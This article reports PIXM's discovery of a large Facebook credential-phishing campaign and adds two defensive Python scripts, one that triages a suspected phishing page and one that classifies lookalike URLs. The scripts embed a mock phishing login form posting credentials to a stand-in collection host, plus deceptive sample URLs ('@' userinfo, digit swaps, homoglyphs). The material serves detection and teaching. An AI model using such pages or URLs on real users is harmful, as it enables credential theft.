Anti-phishing company PIXM has uncovered a large-scale phishing campaign and identified the person behind it.
Phishing remains a go-to technique for threat actors, and this campaign shows why: according to PIXM, a single actor stole roughly one million sets of Facebook account credentials in just four months. A fake Facebook login portal stood in for the social network's real landing page, and users who entered their account information in an attempt to log in instead handed it straight to the attacker.
“It’s impressive how much revenue a threat actor can generate even without resorting to ransomware or other common forms of fraud, such as gift card requests or PayPal emergency requests,” said Chris Clements, vice president of Solutions Architecture at cybersecurity firm Cerberus Sentinel. “With enough scale, even actions like ad referrals that result in cents can add up to amounts that become attractive for cybercriminals to exploit.”
The phishing tactics used to steal Facebook credentials
When PIXM investigated the fake landing page further, it found in the page code “a reference to the actual server hosting the database server to collect the users’ login credentials.” That server was distinct from the legitimate site the page imitated and was reached through a series of redirects. The code also contained a link to a traffic monitoring application, which let the anti-phishing company view the campaign’s tracking statistics. Those statistics revealed not only the traffic to this one phishing page but also a host of other fake landing pages run by the same actor.
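The two artefacts PIXM pulled out of the page code, the server that actually receives the credentials and the third-party tracking link, are exactly what a static look at a suspected phishing page should surface. The script below is an added example, not PIXM’s tooling or the article’s own code: it parses a constructed lookalike login page (all hosts use the reserved `.invalid` suffix and are made up for illustration), lists where each form posts, flags any form whose target host differs from the page’s own host, and enumerates the third-party hosts the page pulls resources from.

```python
"""Triage a suspected phishing login page from its HTML source.

Added example; the page below is constructed for illustration and is
not the page PIXM analysed.  The two questions answered are the ones an
investigator asks first: where do submitted credentials go, and which
third-party hosts (trackers, stats counters) does the page talk to?
"""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

# Constructed sample: a lookalike login page served from a hosting service.
PAGE_URL = "https://fb-login-verify.example-hosting.invalid/index.html"
PAGE_HTML = """
<html><head><title>Log in to Facebook</title>
<script src="https://stats.tracker-app.invalid/counter.js"></script>
</head><body>
<form method="post" action="https://collect.harvest-db.invalid/save.php">
  <input name="email"><input name="pass" type="password">
  <button>Log In</button>
</form>
<img src="https://stats.tracker-app.invalid/pixel.gif?site=fb1">
<a href="https://www.facebook.com/policies">Terms</a>
</body></html>
"""


class RefCollector(HTMLParser):
    """Collect form actions and every src/href, resolved against the page URL."""

    def __init__(self, base_url):
        super().__init__()
        self.base_url = base_url
        self.form_actions = []
        self.refs = []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            # A missing action means the form posts back to the page itself.
            self.form_actions.append(urljoin(self.base_url, a.get("action") or ""))
        for key in ("src", "href"):
            value = a.get(key)
            if value and not value.startswith(("#", "javascript:")):
                self.refs.append(urljoin(self.base_url, value))


def host_of(url):
    """Lower-cased host part of a URL, or '' if it has none."""
    return (urlsplit(url).hostname or "").lower()


def triage(page_url, html):
    """Return where credentials are posted and which other hosts are referenced."""
    collector = RefCollector(page_url)
    collector.feed(html)
    page_host = host_of(page_url)
    return {
        "page_host": page_host,
        # Each form target, with a flag when it leaves the page's own host.
        "form_targets": [
            {"url": action, "cross_origin": host_of(action) != page_host}
            for action in collector.form_actions
        ],
        # Every host other than the page's own that the page loads or links to.
        "third_party_hosts": sorted(
            {host_of(u) for u in collector.refs if host_of(u) != page_host}
        ),
    }


if __name__ == "__main__":
    result = triage(PAGE_URL, PAGE_HTML)
    print("page host      :", result["page_host"])
    for target in result["form_targets"]:
        print("form posts to  :", target["url"],
              "(cross-origin)" if target["cross_origin"] else "")
    print("third parties  :", ", ".join(result["third_party_hosts"]))
```

A form on a supposed Facebook login page that posts to a host other than the one serving the page is the single strongest static indicator; the tracker host is what gave PIXM its pivot to the rest of the campaign. The check is static only: pages that set the form action or submit credentials from JavaScript at runtime will not show the target in the HTML, so the network requests made on submit should be inspected as well.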
“People often underestimate the value of their social media accounts because they don’t enable MFA and otherwise protect their accounts from cybercriminals. Unfortunately, when an attacker takes over an account, it is often used to attack their own friends and family,” said Erich Kron, security awareness advocate at KnowBe4. “By using a real account that has been compromised, bad actors will use the trust inherent in a known connection to trick people into taking actions or risks that they normally wouldn’t.”
It later emerged that the malicious links were sent from within Facebook itself: once the threat actor gained access to a victim’s account, it used that account to send the phishing link en masse to the victim’s friends, harvesting still more credentials. The fake landing pages were allegedly deployed on legitimate app-hosting and page-building services such as glitch.me, famous.co, amaze.co and funnel-preview.com, which generated URLs for the fake Facebook pages that looked plausible enough to trick recipients into entering their account information and having it stolen.
Further investigation traced the attacks to a threat actor in Colombia and turned up an email address belonging to the person behind them.
Ways to avoid falling victim to Facebook phishing
The most important defense against these attacks is not to click on links that look suspicious, even when they appear to come from a friend or another trusted source. A link arriving from someone close to you does not mean that person sent it: as the campaign above shows, the message may have come from their compromised account.
“To stay safe, people need to be aware of the types of fraud campaigns cybercriminals are conducting and stay on the lookout,” Clements said. “All unusual requests from social media contacts should be independently verified by other means, such as calling your friend to confirm that the requested action was legitimate.”
One way to keep an account from being taken over is to enable MFA, which requires a second factor, typically a one-time code, in addition to the password before anyone can sign in. A stolen password alone is then not enough for the attacker to log in. Note that a lookalike page can also ask for the one-time code and relay it to the real site in real time, so MFA based on codes raises the bar without removing the risk; a hardware security key or passkey, which is bound to the genuine site’s origin and cannot be replayed to a lookalike, is the phishing-resistant option.
“To protect themselves from the threat, individuals must enable MFA on their accounts and use unique and strong passwords for each account,” Kron said. “Individuals should always be wary of unusual requests or messages, even if they are sent by a trusted friend. If people are ever asked to verify themselves, they should make sure to look at the URL bar in the browser to make sure they’re logging in to the real website and not a lookalike.”
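The advice to check the URL bar is easier to give than to follow, because lookalike URLs are built precisely to survive a glance: the brand name appears in a subdomain or path, a digit stands in for a letter, or a fake host sits after an `@`. The script below is an added example, not from the article, PIXM or KnowBe4, and encodes the rule that actually decides the question: only the registrable domain matters. The trusted domain set and the sample URLs (again on the reserved `.invalid` suffix) are assumptions made for illustration; the registrable-domain helper is simplified and does not handle multi-part public suffixes such as `co.uk`.

```python
"""Is the URL in the address bar really facebook.com?

Added example, not from the article.  Only the registrable domain (the
last two labels here, a simplification) decides; a brand name in a
subdomain, path or userinfo proves nothing.  Sample URLs are constructed.
"""
from urllib.parse import urlsplit

# Assumption: the set of domains this check treats as the genuine site.
LEGIT_DOMAINS = {"facebook.com", "fb.com"}
BRAND = "facebook"
# Common digit-for-letter swaps seen in lookalike hostnames.
DIGIT_FOLD = str.maketrans("0135", "oles")


def registrable_domain(host):
    """Last two DNS labels of a host (does not model public suffixes like co.uk)."""
    labels = host.rstrip(".").split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host


def classify(url):
    """Return ('genuine', []) or ('lookalike', [reasons])."""
    parts = urlsplit(url)
    raw_host = parts.hostname or ""
    # IDNA-encode so a brand spelled with non-Latin letters becomes an xn-- label.
    host = raw_host.encode("idna").decode("ascii").lower()
    domain = registrable_domain(host)
    if domain in LEGIT_DOMAINS:
        return "genuine", []

    reasons = []
    if parts.username is not None:
        reasons.append("userinfo before '@' hides the real host %s" % host)
    if any(label.startswith("xn--") for label in host.split(".")):
        reasons.append("internationalized (punycode) label; possible homoglyph lookalike")
    if registrable_domain(host.translate(DIGIT_FOLD)) in LEGIT_DOMAINS:
        reasons.append("digit-for-letter substitution of a legitimate domain")
    elif BRAND in host:
        reasons.append("brand appears only in a subdomain of %s" % domain)
    if BRAND in parts.path.lower():
        reasons.append("brand appears only in the URL path")
    if not reasons:
        reasons.append("unrelated domain %s" % domain)
    return "lookalike", reasons


# Constructed samples covering the tricks above.
SAMPLES = [
    "https://www.facebook.com/login/",
    "https://facebook.com.login-verify.example-host.invalid/",
    "https://www.facebook.com@evil.example-host.invalid/login",
    "https://faceb00k.com/login",
    "https://example-host.invalid/facebook/login",
    "https://fаcebook.com/",  # first 'a' is Cyrillic U+0430
]

if __name__ == "__main__":
    for sample in SAMPLES:
        verdict, reasons = classify(sample)
        print("%-10s %s" % (verdict, sample))
        for reason in reasons:
            print("           - " + reason)
```

The deciding line is the registrable-domain comparison; everything after it only explains to the reader which trick was used. A password manager applies the same origin rule automatically, refusing to fill credentials on a host it has never seen, which is why it is a stronger defense than eyeballing the address bar.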